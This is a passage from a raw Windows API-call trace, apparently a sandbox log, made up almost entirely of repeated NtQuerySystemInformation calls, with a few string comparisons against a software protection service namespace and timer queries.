(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0269.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0269.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0269.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0269.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0269.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0269.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x28, ResultLength=0x0) [0269.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0269.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0269.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x20, ResultLength=0x0) [0269.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0269.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0269.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0269.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0269.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x20, ResultLength=0x0) [0269.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0269.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0269.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.807] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f8, Length=0x50, ResultLength=0x0) [0269.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x38, ResultLength=0x0) [0269.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0269.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0269.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0269.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0269.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x38, ResultLength=0x0) [0269.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0269.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0269.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x38, ResultLength=0x0) [0269.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0269.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x38, ResultLength=0x0) [0269.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0269.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0269.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0269.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc08, Length=0x50, ResultLength=0x0) [0269.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb80, Length=0x28, ResultLength=0x0) [0269.814] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc08, Length=0x50, ResultLength=0x0) [0269.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc08, Length=0x50, ResultLength=0x0) [0269.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0269.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0269.814] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0269.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0269.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0269.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x38, ResultLength=0x0) [0269.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0269.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0269.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0269.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x28, ResultLength=0x0) [0269.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x38, ResultLength=0x0) [0269.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc940, Length=0x28, ResultLength=0x0) [0269.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc940, Length=0x28, ResultLength=0x0) [0269.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x38, ResultLength=0x0) [0269.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x20, ResultLength=0x0) [0269.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x20, ResultLength=0x0) [0269.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x20, ResultLength=0x0) [0269.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x20, ResultLength=0x0) [0269.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x38, ResultLength=0x0) [0269.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x20, ResultLength=0x0) [0269.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0269.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0269.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.825] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfcb50 | out: lpSystemTimeAsFileTime=0xc751dfcb50*(dwLowDateTime=0x219fc73, dwHighDateTime=0x1d5fb6f)) [0269.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc08, Length=0x50, ResultLength=0x0) [0269.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb40, Length=0x28, ResultLength=0x0) [0269.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca58, Length=0x50, ResultLength=0x0) [0269.825] GetTickCount () returned 0x1183c6a [0269.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc928, Length=0x58, ResultLength=0x0) [0269.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0269.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0269.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0269.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0269.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0269.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x28, ResultLength=0x0) [0269.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0269.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0269.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x20, ResultLength=0x0) [0269.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0269.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0269.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0269.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0269.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x20, ResultLength=0x0) [0269.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0269.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0269.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.837] NtQuerySystemInformation (SystemInformationClass=0xb9, 